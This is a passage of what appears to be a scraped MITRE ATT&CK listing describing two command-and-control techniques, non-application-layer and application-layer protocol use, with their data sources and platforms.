Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre